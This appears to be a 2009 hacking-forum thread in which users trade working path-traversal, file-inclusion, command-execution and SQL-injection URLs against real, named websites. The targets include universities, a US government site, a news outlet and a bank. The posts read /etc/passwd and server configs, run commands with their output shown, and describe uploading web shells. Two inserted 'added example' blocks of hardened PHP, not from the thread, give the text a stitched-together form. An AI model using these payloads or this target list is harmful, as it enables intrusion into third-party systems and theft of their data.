http://www.thewho.com/index.php?module=../../../../../../../../../../../../../etc/passwd%00

ph1l1ster
21.04.2009, 14:07
2kgames.com
pr6 | tic 400

http://www.2kgames.com/index.php?p=../../../../../../etc/passwd%00

utbookstore.tennessee.edu

http://utbookstore.tennessee.edu/uccs/index.php?p=../../../../etc/passwd%00

stefanmay.com

http://www.stefanmay.com/index.php?p=../../../../../etc/passwd%00

Rubaka
22.04.2009, 22:41
http://www.myspace-layouts.us/pages.php?page=../index

BHYCHIK
23.04.2009, 01:33
http://www.vcdh.virginia.edu/index.php?page=../../../etc/passwd%00

S00pY
26.04.2009, 16:45
hmm
http://ssw.uconn.edu/index.php?path=index.php%00

Gar|k
29.04.2009, 00:23
http://rastaman.tales.ru/?page=lol&menu1=1&menu2=2&smenu1=1&inctext=6

maybe it's a repost, I don't know
but the fairy tales there are cool ) also try messing with the other variables, lots of interesting stuff there too

winstrool
30.04.2009, 14:37
_http://www.logicnsk.ru/price/?file=../../../../../../etc/passwd&cat_id=654

udman
09.05.2009, 20:22
http://gps.ck.ua/index.php?id=../../

udman
10.05.2009, 00:58
you can also dig around here

http:// de n.zp.ua/index.php?page=../filename

Rubaka
11.05.2009, 21:54
http://www.pubertaetverstehen.ch/index.php?pageid=../../../../../../../../../etc/passwd%00

bug1z
13.05.2009, 17:02
http://fanforum.org.ua/misc.php?do=info&show=../../../../../../../../etc/passwd%00.html
http://www.itnr.ru/misc.php?do=info&show=../../../../../../../../etc/passwd%00.html
http://wirfilms.com/misc.php?do=info&show=../../../../../../../../etc/passwd%00.html

vasyan
15.05.2009, 13:14
http://www.hcs.harvard.edu/gradmus/abstract.php?name=../../../../../../../../../../../../../../../etc/passwd%00

or like this

http://www.hcs.harvard.edu/gradmus/abstract.php?name=../abstract.php%00
:)

InFlame
15.05.2009, 19:40
http://www.mtcwork.com.au/innovation.php?file=../../../../../../../../../../etc/passwd
OS: FreeBSD

ILYAtirtir
18.05.2009, 02:37
U.S. Department of Housing and Urban Development
http://www.hud.gov/news/release.cfm?content=../../../../../../../../../../etc/passwd

$n@ke
19.05.2009, 12:05
ololo
http://137.207.248.30/60-270/php/viewsource.php?fname=../../../../../../../etc/apache2/httpd.conf

ta-kyn
23.05.2009, 05:38
This is probably the right place for this.

Master PFP (Printer Friendly Page) v1.7 - multi-file include
Off.site: www.willmaster.com (http://www.willmaster.com)
Google: 'inurl:MasterPFP.pl?doc='

Dumping them in bulk =]

On the official site:
www.willmaster.com/software/pfp/MasterPFP.cgi?doc=../../../
.edu
www.rsp.wisc.edu/scripts/MasterPFP.pl?doc=../../../../../etc/passwd
Command execution:
http://www.insolvenzrechtstag.de/cgi-bin-local/masterpfp.cgi?doc=|ls|
http://www.german-philharmonic-bigband.de/cgi-bin-local/masterpfp.cgi?doc=|ls|
And so on:

The matrix
23.05.2009, 15:17
http://www.3sys.de/index/index.pl?url=download-index.de&seite=|id|

uid=30(wwwrun) gid=60001(visas) groups=60001(visas)

http://www.3sys.de/index/index.pl?url=download-index.de&seite=|which%20wget|

/usr/bin/wget


; ))))))

The matrix
24.05.2009, 00:02
1)
leinebeerfilms.nl
http://www.kleinebeerfilms.nl/cgi-bin/index.pl?page=../../../../../../../../../etc/passwd%00.txt
neilthompson.us
http://www.neilthompson.us/iec5qz8twrqk/fhist/page.pl?page=|id|

uid=465686 gid=888(vusers) groups=33(www-data)

http://www.neilthompson.us/iec5qz8twrqk/fhist/page.pl?page=|which%20wget|

/usr/bin/wget

good luck uploading a shell ; ))

vasyan
26.05.2009, 14:44
http://iah.ipm.illinois.edu/index.php?ch=../../etc/passwd

RulleR
29.05.2009, 10:59
[PR 4]
http://www.sitemad.com/index.php?p=popup&tpl=/etc/passwd
[PR 3]
http://www.doc-darmer-net.de/hpmaker/index.php?p=/etc/passwd
[PR 2]
http://www.gustatus.org/index.php?p=index.php

faza02
30.05.2009, 13:10
http://mzrd.ru/?f=../../../../../../../../../../../../../etc/passwd%00

ta-kyn
30.05.2009, 15:58
www.CBC.ca - Canadian News [PR 8]
www.cbc.ca/cgi-bin/quiz/quiz.cgi?quiz=../../../../../../../../etc/passwd%00

ProoF
02.06.2009, 18:10
catenabrasil.com

http://catenabrasil.com/portal/index.php?arq=[SHELL]

ProoF
02.06.2009, 22:26
WINNT

http://lib.mjes.tpc.edu.tw:9999/appserv/main.php?appserv_root=[shell]

ta-kyn
03.06.2009, 04:09
.edu.pl [PR 5]

http://www.amp.edu.pl/eng/index.php?strona=../../../../../../../../etc/passwd%00

mailbrush
03.06.2009, 15:03
http://www.beauteby.com/ru/gernetic/luxe.php?id=../../../../index

Велемир
04.06.2009, 01:29
http://www.orion.ua/modules/CATALOG/download.php?file=../../../../../../../../../../../../../../../../../etc/passwd%00%00

LFI

Lots of interesting stuff, but access to the sites on the VPS is closed (((. I haven't really explored anything there... httpd.conf is at the standard path - /etc/httpd/conf/httpd.conf

Anyway, if you dig anything up, write to me via PM/icq )

One more thing: if the file or folder exists, it offers a .pdf file for download. Rename it to .doc (that way it is formatted right away, unlike txt) or to .html. If html, open it in IE (IMHO the best option). If the file does not exist, you just get a white screen. Directories are checked the same way. If there are no permissions, a 1 KB file is offered for download. It will contain an error in file_get_contents(), the error itself being Permission Denied. That's all. Thanks everyone :)

gluke
04.06.2009, 02:57
http://www.wines.at/forum/setcookie.php?u=../../../../../../../../../../../../etc/passwd%00%00

nik3241
06.06.2009, 01:03
a site about fighting junkies

http://nobf.ru/index.php/download.php?file=../../../../../../etc/passwd

RulleR
06.06.2009, 13:41
http://ezonet.ru/reports.php?page=../index.php
http://www.911pcar.com/index.php?page=../../../etc/passwd
http://aplus-computer.net/myspacegraphicshelper/onlinepss//index.php?page=../index.php

RulleR
08.06.2009, 15:45
[PR 4]
http://triod.kiev.ua/index.php?page=index.php
[PR 4]
http://www.chicagohungarians.com/index.php?page=/etc/passwd
[PR 3]
http://www.dbd.com.au/index.php?page=index.php
[PR 0]
http://legeartis-stom.com/index.php?page=/etc/passwd

BHYCHIK
08.06.2009, 21:57
http://www.cyl.ru/index.php?page=3&lang=../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00

Site directory: /usr/www/cyl.ru/www/

Gorev
15.06.2009, 11:20
http://www.lohuis.ro/index.php?page=../../../../../../../../../../etc/passwd%00

Pashkela
15.06.2009, 12:19
Haven't checked for reposts:

http://www.americascup.com/es/acmag/votre_interview/index.php?idContent=12688&idIndex=../../../../../../../../../../etc/passwd%00

http://www.clubedoexercito.com.br/index.php?arq=/home/httpd/vhosts/clubedoexercito.com.br/httpdocs/index

http://www.inoticia.com.br/index.php?arq=/home/httpd/vhosts/inoticia.com.br/httpdocs/config/config

http://www.aciub.com.br/index.php?arq=/var/www/dominios/www.aciub.com.br/site/index

http://www.coacyle.com/index.php?sec=D:%5CTrabajos%5Cwwwcoacyle%5Ccontrol %5Cincludes%5Cfunciones&id=81

mailbrush
15.06.2009, 19:47
http://www.dalcomstechnologies.com/products.php?id=[LFI]

[aywo]
16.06.2009, 12:26
PR 4
http://toyota.mnc.ru/?path=../../../etc/&file=passwd


PR 3
http://www.divetrade.ru/magazin/index.php?page=../../../../../../../../../../etc/passwd
(online shop on FreeBSD)

PR 3
http://www.autosport.com.ua/index.php?part=FAU&page=../../../../../../../../../../../etc/passwd

PR 3
http://www.alpha-sport.ru/index.php?page=index.php

PR 2
http://www.basegroup.su/index.php?Page=/../../../../../../../../../../../etc/passwd

mailbrush
16.06.2009, 18:46
http://www.ahoj-brause.de/produkte.php?id=3&sub=[LFI]

geforse
17.06.2009, 08:34
PR4
http://tunguska.sai.msu.ru/index.php?q=[LFI]

PR0
http://obti.com.ua/modules/mod_focalizar_ajaxmodule/js/file_includer.php?file=[LFI]

http://www.uspeh-b.ru/modules/mod_focalizar_ajaxmodule/js/file_includer.php?file=[LFI]

Adm1n4eG
17.06.2009, 11:23
http://www.govor.ru/visit/tours/i mg.php?location=/etc/passwd

save and open it...

geforse
17.06.2009, 15:36
PR2
http://catviz.sourceforge.net/index.php?userman_form=../../../../../../../../../../../../../etc/passwd

$n@ke
18.06.2009, 20:45
gaff
http://www.bfhd.wa.gov/news/news.php?newsflash=../../../../../../../../apache/conf/httpd.conf

Dj-Matrix
18.06.2009, 21:38
http://www.midland.edu/success/students.php?page=../../robots.txt

AlexSatter
19.06.2009, 09:26
http://inss.ru/index.php?id=index.php

geforse
20.06.2009, 22:59
http://www.imageup.ru/img12/rowdown2153787.png

PR3
http://www.galileo-tv.ru/inner.php?page=[LFI]

A shell can be uploaded via an image

Pashkela
21.06.2009, 04:16
A few injections and file readers, including blind ones; most of them probably haven't been posted, since I haven't yet seen scanners that handle the case where errors aren't displayed:



Pashkela
21.06.2009, 13:49

AlexSatter
25.06.2009, 14:41
http://www.toebu.imschmatt.ch/gaestebuch/index-aaa.php?id=../../../../../etc/passwd
http://www.toebu.imschmatt.ch/gaestebuch/index-aaa.php?id=../../../../../etc/ssh/sshd_config
http://www.toebu.imschmatt.ch/gaestebuch/index-aaa.php?id=../../../../../usr/local/etc/php.ini
http://www.toebu.imschmatt.ch/gaestebuch/index-aaa.php?id=../../../../../etc/my.cnf
----

http://tequilajazzz.com/zzz.php?zzz=zzz.php%00

---

http://valganoored.leadmaster.pri.ee/?id=index.php%00

---

http://radomiak.info/index.php?id=index.php%00

---

http://www.classic-appraisals.com/?id=index.php

Pashkela
26.06.2009, 15:18

RulleR
06.07.2009, 23:43
[PR 6]
http://web.ce.metu.edu.tr/index.php?id=../../../index
[PR 6]
http://www.ipp.mesi.ru/edu/index.php?id=index

Fata1ex
08.07.2009, 21:44
http://www.motormania.hr/index.php?forwardUrl=../../../../../etc/passwd
:(

Ctacok
09.07.2009, 23:59
http://www.jlc-software.com/?page=../../../../etc/passwd
:)
Safe mode :(

schwarze
11.07.2009, 20:08
http://www.mumost.cz/informace/index.htm?fr2=../../../ etc. and so on)

RulleR
12.07.2009, 23:54
[PR 6]
http://www.piedmont.edu/index.php?id=../index.php%00

Pashkela
17.07.2009, 23:06

Pashkela
18.07.2009, 02:25
http://www.embavenez-us.org/index.php/function.include?pagina=../../../../../../../../../../../../../../etc/passwd

----------------------------- fuck owner:)
http://annamusic.ru/index.php?inc=../../../../../../../../../../../../../../etc/passwd - for some reason it swears rudely here
http://annamusic.ru/index.php?inc=../../../../../../../../../../../../../../etc/passwd%00
http://annamusic.ru/index.php?inc=../../../../../../../../../../../../../../etc/ssh/sshd_config%00

_>SubDeviL<_
18.07.2009, 23:41
http://dtv.horizont.by/index.php?id=../../../../../../etc/passwd

seems like quite a lot is hosted there..

ph1l1ster
23.07.2009, 19:46
http://www.spaziopetardo.it/letterit2/inc/wysiwyg.php?language=../../../../../../../../../../../../../etc/passwd%00
http://www.classicbattletech.com/index.php?action=../../../../../../../../../../../../../etc/passwd%00
http://highwaycompanions.com/index.php?module=../../../../../../../../../../../../../etc/passwd%00
http://www.velvetrevolver.com/index.php?module=../../../../../../../../../../../../../etc/passwd%00
http://www.everestkc.net/index.php?module=../../../../../../../../../../../../../etc/passwd%00

ph1l1ster
23.07.2009, 21:48
Another small batch ;)



anti-repost check - google

ilinsky
24.07.2009, 12:04
Directory

http://doska42.ru/index.php?rub=news&page=../../../../../../../etc/

A file in it

http://doska42.ru/index.php?rub=newspod&rubnews=../../../../../../../../../..&page=FILENAME

ph1l1ster
28.07.2009, 23:07
A bank,
multibanka.com

It fetches a file, for example:

http://www.multibanka.com/get_file.php?ext=pdf&q=c3VyL25vaXRhY2lscHBhL3N0bmVtdWNvZC9zZWxpZl9kZWRh b2xwdT1odGFwX2VsaWY7ZmRwLnVyXzcwMDJfc3Rza2FyYXNfdX RzbGF2XzI9ZW1hbl9lbGlm

Base64!
Decoding:

sur/noitacilppa/stnemucod/selif_dedaolpu=htap_elif;fdp.ur_7002_stskaras_utslav_2=eman_elif

^_^

file_name=2_valstu_saraksts_2007_ru.pdf;file_path=rus/application/documents/selif_dedaopu

Doing /etc/passwd the smart way

/cte/=htap_elif;dwssap=eman_elif

And fetch it :)

http://www.multibanka.com/get_file.php?ext=pdf&q=L2N0ZS89aHRhcF9lbGlmO2R3c3NhcD1lbWFuX2VsaWY=

that's the kind of cr*p it is.

P.S:

get_file.php

include "include_php/my_encoder.php";

decode_str( $_GET['q'] );
$file_type = explode('.',$_GET['file_name']);
$file_type = end($file_type);
if(strtolower($file_type)=='pdf')
    header('Content-type: application/pdf');

//print_r($_GET);
header("Content-Description: File Transfer");
header("Content-Disposition: attachment; filename=". $_GET['file_name']);
header("Content-Transfer-Encoding: binary");
header("Content-Type: application/download");
header("Accept-Ranges: bytes");
header("Content-Length: ". filesize($_GET['file_path']."/".$_GET['file_name']));

$file = $_GET['file_path']."/".$_GET['file_name'];
$filename = fopen($file,"r");
$data = fread($filename, filesize($file));
fclose($filename);

echo $data;

my_encoder.php

function encode_str($string) {
    return base64_encode(strrev($string));
}

function decode_str($string) {
    $result = strrev(base64_decode($string));

    // SQL injection tests

    if ((eregi("SELECT", $s)) || (eregi("select", $result)) || (eregi("UNION", $result)) || (eregi("union", $result))) {
        Header("Location: http://www.bs.lv/track_hacker.php");
    }

    $tmp_arr=split(";",$result);

    for ( $i=0; $i<=sizeof($tmp_arr); $i++ ) {
        $ta = split("=",$tmp_arr[$i]);

        if ($ta['0']) {
            $_GET[$ta['0']] = $ta['1'];
        }
    }

}
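
The handler quoted in the post above lets the decoded q string set any $_GET key and then opens file_path/file_name without checking where it points. A hardened counterpart, as an added example that is not part of the original post or the site's code; DOWNLOAD_ROOT, the type allowlist and the function names are assumptions:

```php
<?php
// Added example: hardened counterpart of get_file.php / my_encoder.php.
// DOWNLOAD_ROOT, ALLOWED_TYPES and all function names are hypothetical.
declare(strict_types=1);

const DOWNLOAD_ROOT = '/var/www/uploaded_files';   // assumed storage root
const ALLOWED_TYPES = ['pdf' => 'application/pdf'];

/** Decode the reversed-base64 token into a local array; never write to $_GET. */
function decode_token(string $token): ?array
{
    $raw = base64_decode($token, true);            // strict mode rejects non-base64 input
    if ($raw === false) {
        return null;
    }
    $fields = [];
    foreach (explode(';', strrev($raw)) as $pair) {
        $kv = explode('=', $pair, 2);
        // Only the two expected keys are accepted; anything else is dropped.
        if (count($kv) === 2 && in_array($kv[0], ['file_name', 'file_path'], true)) {
            $fields[$kv[0]] = $kv[1];
        }
    }
    return count($fields) === 2 ? $fields : null;
}

/** Return the canonical path of the requested file, or null if it is not allowed. */
function resolve_download(array $fields, string $root = DOWNLOAD_ROOT): ?string
{
    if (strpos($fields['file_name'] . $fields['file_path'], "\0") !== false) {
        return null;                               // NUL bytes never belong in a path
    }
    $name = basename($fields['file_name']);        // strip any directory part
    $ext  = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED_TYPES)) {
        return null;
    }
    $base = realpath($root);
    // realpath() resolves ../ and symlinks and returns false for missing files.
    $real = realpath($root . '/' . $fields['file_path'] . '/' . $name);
    if ($base === false || $real === false || !is_file($real)) {
        return null;
    }
    // Containment check on the canonical path, with a trailing separator so a
    // sibling such as /var/www/uploaded_files_old does not pass as a prefix.
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

function send_download(string $token): void
{
    $fields = decode_token($token);
    $path   = $fields === null ? null : resolve_download($fields);
    if ($path === null) {
        http_response_code(404);                   // same answer for every rejection
        return;
    }
    $ext  = strtolower(pathinfo($path, PATHINFO_EXTENSION));
    // The header value is built from the validated name, reduced to safe characters.
    $safe = preg_replace('/[^A-Za-z0-9._-]/', '_', basename($path));
    header('Content-Type: ' . ALLOWED_TYPES[$ext]);
    header('Content-Disposition: attachment; filename="' . $safe . '"');
    header('Content-Length: ' . (string) filesize($path));
    header('X-Content-Type-Options: nosniff');
    readfile($path);
}

if (PHP_SAPI !== 'cli') {
    $q = $_GET['q'] ?? '';
    send_download(is_string($q) ? $q : '');        // q[]=... arrays are refused
}
```

Reversing and base64-encoding the parameter is encoding, not access control; the containment check on the canonical path is what keeps requests inside the download directory.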

ph1l1ster
29.07.2009, 14:04
http://www.lastminute-music.com/index.php?inc=/etc/passwd


http://www.pubs.org.au/index.php?inc=/etc/passwd

mailbrush
03.08.2009, 12:32
TIC: 50
PR: 4

RFI
http://www.bloodfmba.ru/news/mir.php?id=RFI

Ctacok
05.08.2009, 17:29
http://www.centerforloss.com/articles.php?file=
Local include.
Couldn't get through to /etc/passwd, the hosting has a filter.


http://www.matchmaking.at/athen2008/index.php?file=

local include.
somehow couldn't find /etc/passwd

http://www.westbalkanresearch.net/index.php?file=

Same trouble :(

mailbrush
06.08.2009, 09:51
PR4

LFI

http://www.akademiaurody.com/index.php?id=[LFI]

FireFenix
07.08.2009, 12:57
LFI

TIC 240
PR 5/10
http://www.tnpu.edu.ua/php1/index.php?page=../../../../../../etc/passwd

FireFenix
07.08.2009, 15:00
On the forum I only found an sql-inj for this site, so I'll post a php-inj

LFI
http://www.uvm.edu/student_life/?Page=../phpinfo.php

satana-fu
07.08.2009, 16:27
and a little piece from me too

http://www.lauralee.com/index.cgi?page=../../../../../../../etc/passwd%00
http://www.cats-online.ru/index.cgi?state=article_phsycology&page=../../../../../../../etc/passwd%00
http://www.phathack.com/index.cgi?page=../../../../../../../../../../../../../../etc/passwd%00
http://www.concordalliance.org/index.cgi?page=../../../../../../../../../../../../../../../../../../etc/passwd%00

+++AndreyDevil+++
08.08.2009, 02:17
http://www.menlo.edu/library/courses/courses.php?course=../../../../../../etc/passwd

mailbrush
13.08.2009, 17:26
http://www.halalapalooza.com/d.php?id=[LFI]

pi7dets
14.08.2009, 16:08
http://www.ksu.ru/f9/k2/new/phpMyAdmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc/passwd%00 PR7, TIC 2100

BHYCHIK
15.08.2009, 18:43
PHP injection on the site aphorism-list.com with the ability to upload a shell.

http://aphorism-list.com/frasy.php?page=../../../../../../../../../../../../../../../../../../../etc/passwd%00
http://aphorism-list.com/frasy.php?page=../../../../../../../../../../../../../../../../../../../proc/self/environ%00

The shell uploads without problems by spoofing the user-agent and including /proc/self/environ (anyone who read the latest issue of Хакер will definitely understand)

By the way, there's a windows xp sp3 distribution sitting on the hosting)

One more thing: can someone tell me why /proc/self/environ can't always be included (on *nix systems, naturally)? Not enough permissions?

geezer.code
15.08.2009, 22:37
http://www.leonardo-co.com/index.php?folder=Career&page=../../../../../../../../../../etc/passwd
http://www.bonnarealty.com/home.php?inc=../../../../../../../../etc/passwd

BHYCHIK
16.08.2009, 16:15
http://www.tallinnamerepaevad.ee/est.php?page=../../../../../../../../../../etc/passwd%00

mailbrush
16.08.2009, 20:28
http://stanleycup.crash.sk/sc.php?id=[LFI]
http://www.dalcomstechnologies.com/pricing.php?id=[LFI]

BHYCHIK
17.08.2009, 14:22
http://www.pillows.jp/20th/p/index.php?page=../../../../../../../../../../../../etc/passwd%00

BHYCHIK
18.08.2009, 00:43
Injections on 2 Japanese sites

http://www.holos.jp/index.php?page=../../../../../../../../../../../../../../../../../../../../../../etc/group

http://mobasp.jp/page.php?cat=../../../../../../../../../../../../../../../../../../../../etc/passwd

5rap
19.08.2009, 12:09
Decided to poke around again looking for php inj:

http://www.fitnessmanager.ru/index.php?page=../../../../../../../etc/passwd

RulleR
20.08.2009, 14:41
http://www.handballneuchatel.ch/httpdocs/index.php?inc=../../../etc/passwd%00
http://www.robotsandbotanics.de/index.php?inc=../../../../../../../../etc/passwd%00
http://www.tasteone-medientechnik.de/index.php?inc=../../../../../../../etc/passwd%00
http://www.haldergmbh.de/index.php?inc=/etc/passwd
http://blesk.issa.cz/index.php?inc=index.php%00

dr.Web
20.08.2009, 22:13
http://wow.crpg.ru/modules.php?op=modload&name=..&file=index
file viewing

monolog
20.08.2009, 23:23
http://iea.uoregon.edu/page.php?query=static&file=/../../../../../../../../../../../../../etc/passwd
http://occs.odu.edu/page.php?page=news_security/../../../../../../../../../../../../../../../../../../../../etc/passwd
http://languagesupport.msu.edu/page.php?toggle=5&id=SectionProfDev/../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd

HAXTA4OK
23.08.2009, 11:08
http://www.lambproject.org/content.php?tt=../../../../../../etc/passwd&pc1=&pc2=spacer&pc3=spacer&origin=

Fuckel
23.08.2009, 23:51
http://www.veye.com.ua/doc.php?d=../

RulleR
24.08.2009, 11:15
http://www.emini-collection.ch/index.php?file=../../../../etc/passwd%00
http://www.jolly-dent.de/index.php?file=/etc/passwd%00
http://www.e-medica.jp/index.php?file=../../../../../etc/passwd%00

HAXTA4OK
24.08.2009, 15:06
http://www.eximoforta.ru/index.php?file=index.php index.php loop

Joker-jar
28.08.2009, 19:59
http://www.ruspi.ru./?page=[local]

z00MAN
28.08.2009, 23:58
http://www.ie.rmutk.ac.th/index.php?file=../../../../../../../etc/passwd

http://www.cdu-rhauderfehn.de/index.php?folder=pages&file=../../../../../../../etc/passwd

Swift
29.08.2009, 19:01
http://yuanpei.pku.edu.cn/old/index.php?option=com_content&task=view&id=[RFI]

ph1l1ster
30.08.2009, 19:20
http://www.tzimakos.gr/print.php?id=/proc/self/environ

http://my.getmorediamonds.com/getstarted.php?id=index.php&url=../../../../../../etc/passwd

http://www.joeplecker.com/display.php?id=/proc/self/environ

http://petercottontailpreschool.com/index.php?id=/etc/passwd

edge911
30.08.2009, 22:46
http://pvp-game.ru/index.php?act=../index index.php loop

ph1l1ster
07.09.2009, 20:16
I think it's better to file this under php injection.. although google says that as an sql injection it's a repost, the bug is in a different script anyway!)

An interesting SQL injection: it takes the file name from the DB and offers it for download. (Personally, this is the first time I've come across this)

http://www.ces.fau.edu/OWLS08/presentations/presentations.php?id=-24+union+select+version()--

A file is offered for download, with the output in the file name:

5.0.51a-3ubuntu5.4

let's substitute our own value:
magic quotes = on, so we hex it

http://www.ces.fau.edu/OWLS08/presentations/presentations.php?id=-24+union+select+0x2f6574632f706173737764--

And we download /etc/passwd :)

presentations.php


error_reporting(0);
mysql_connect("localhost","*","*");
mysql_select_db( "owls08" );
error_reporting(1);

$id = mysql_real_escape_string( $_REQUEST['id'] );

$query="SELECT file from presentations where id=$id";
$result = mysql_query( $query ) or die( mysql_error() );
$row = mysql_fetch_array( $result );

$file = $row['file'];

header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");

header("Content-Type: application/force-download");
header( "Content-Disposition: attachment; filename=".basename($file));
header("Content-Transfer-Encoding: binary");
header("Content-Length: ".filesize($file));
header( "Content-Description: File Transfer");
@readfile($file);
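
In the presentations.php source quoted above, mysql_real_escape_string() is applied to a value that is then placed unquoted in a numeric context, so it does not constrain the query, and the returned file column is handed to readfile() as a path. A corrected counterpart, as an added example that is not part of the original post or the site's code; the DSN, credentials, PRESENTATION_DIR, the function names and the premise that the column stores bare file names are assumptions:

```php
<?php
// Added example: corrected counterpart of presentations.php.
// DSN, credentials, PRESENTATION_DIR and function names are hypothetical.
declare(strict_types=1);

const PRESENTATION_DIR = '/srv/owls08/presentations';   // assumed storage directory

/** Accept only a plain positive decimal id; anything else is refused. */
function parse_id($raw): ?int
{
    if (!is_string($raw) || !ctype_digit($raw) || strlen($raw) > 9) {
        return null;
    }
    $id = (int) $raw;
    return $id > 0 ? $id : null;
}

/** Look the file name up with a bound parameter instead of string interpolation. */
function lookup_file(PDO $db, int $id): ?string
{
    $stmt = $db->prepare('SELECT file FROM presentations WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $file = $stmt->fetchColumn();                  // false when no row matches
    return is_string($file) ? $file : null;
}

/** Treat the database value as a bare file name inside PRESENTATION_DIR only. */
function stored_path(string $file, string $dir = PRESENTATION_DIR): ?string
{
    // Assumption: the column stores a bare file name. A value with a directory
    // part, a NUL byte or a dot name is treated as tampering and refused.
    if (strpos($file, "\0") !== false || $file !== basename($file)
        || $file === '' || $file === '.' || $file === '..') {
        return null;
    }
    $path = $dir . '/' . $file;
    return (is_file($path) && !is_link($path)) ? $path : null;
}

function serve_presentation(PDO $db, $rawId): void
{
    $id   = parse_id($rawId);
    $file = $id === null ? null : lookup_file($db, $id);
    $path = $file === null ? null : stored_path($file);
    if ($path === null) {
        http_response_code(404);                   // same answer for every rejection
        return;
    }
    $safe = preg_replace('/[^A-Za-z0-9._-]/', '_', basename($path));
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . $safe . '"');
    header('Content-Length: ' . (string) filesize($path));
    header('X-Content-Type-Options: nosniff');
    readfile($path);
}

if (PHP_SAPI !== 'cli') {
    $db = new PDO(
        'mysql:host=localhost;dbname=owls08;charset=utf8mb4',
        'app_user',                                // placeholder credentials
        'app_password',
        [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION, PDO::ATTR_EMULATE_PREPARES => false]
    );
    serve_presentation($db, $_GET['id'] ?? null);
}
```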

Tigger
13.09.2009, 04:16
http://piecero.awardspace.us/index.php?page=../../../../../../../../../../../etc/passwd
http://www.mvhs.sad3.k12.me.us/sad3/mves/site.php?page=../../../../../../../../../../../etc/passwd

wildshaman
13.09.2009, 10:42
http://www.duma.gov.ru/index.jsp?t=./index.jsp

DFrost
13.09.2009, 13:46
http://www.summerschoolalpbach.at/index.php?file=index.php
http://www.b2match.com/watervienna09/index.php?file=index.php
http://www.autoday2009.sk/index.php?file=../../../../../../../../../../../etc/passwd

Tigger
15.09.2009, 00:29
http://sdm.mit.edu/index.php?fileName=index.php

Calcutta
16.09.2009, 21:13
http://stroycement.ru/stat.php?p=../../../../etc/passwd

HAXTA4OK
19.09.2009, 10:09
http://dnfo.ru/page.php?p=../page
http://www.kamp.ru/page.php?p=page&board=1

DFrost
19.09.2009, 19:05
European investment banking firm
http://www.druekerco.com/index.php?folder=Career&page=../../../../../../etc/hosts.lpd

DeepBlue7
26.09.2009, 00:45
http://eminima.org/safepup/index.php?file=../../../../../../../../../../../etc/passwd

HAXTA4OK
26.09.2009, 09:34
http://www.gnpbu.ru/index.php?file=../index.php
http://wnr.economicus.ru/index.php?file=../index
http://www.eximoforta.ru/index.php?file=index.php

www.oUNIX.ru - about UNIX systems.

http://www.ounix.ru/index.php?page=../admin/index&id=8

la2
http://la2rasta.ru/index.php?f=index

DeepBlue7
27.09.2009, 02:58
http://www.physics.carleton.ca/atlas/index.php?file=../../../../../../../../../../../etc/passwd

http://www.abei.it/index.php?file=../../../../../../../../../../../etc/passwd&sezione=Convegno%20Nazionale%202008&menu=Programma

http://www.enterprise-europe-network.ch/marketplace/index.php?file=../../../../../../../../../../../etc/passwd

HAXTA4OK
27.09.2009, 10:36
http://mypara.ru/index.php?page=index
http://www.autodafe.ru/index.php?page=../index

попугай
29.09.2009, 11:59
http://wework.philaforum.com/index.php?site=http://google.com/search?q=

Pashkela
04.10.2009, 18:04
http://www.ruvr.ru/index.php?lng=../../../../../../../../../../../../../../etc/passwd///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////////////

nikp
07.10.2009, 21:02
http://www.myperfecthalf.com/forum/topic.php?topic_id=364&language_id=../../../../../../etc/passwd%00

nikp
07.10.2009, 22:53
http://www.myperfecthalf.com/member/toprated_list.php?view_mode=gallery&language_id=../../../../../../etc/passwd%00&page=32&command=online
http://kneuro.net/littlesite/index.php?file=/etc/passwd

SeNaP
08.10.2009, 12:02
http://www.prodisney.ru/index.php?page=index.php

nikp
08.10.2009, 12:17
http://www.automoto66.ru/index.php?state=other&file=../../../../../../etc/passwd&page=2
http://www.mainechiropractic.org/index.php?file=/etc/passwd%00

hackmon
08.10.2009, 16:01
http://www.sports-emotions.ch/index.php?cat=../../../../../../etc/passwd%00

0nep@t0p
09.10.2009, 11:50
http://www.villaaqva.com/index.php?page=../../../../../../../proc/self/fd/2%00

hackmon
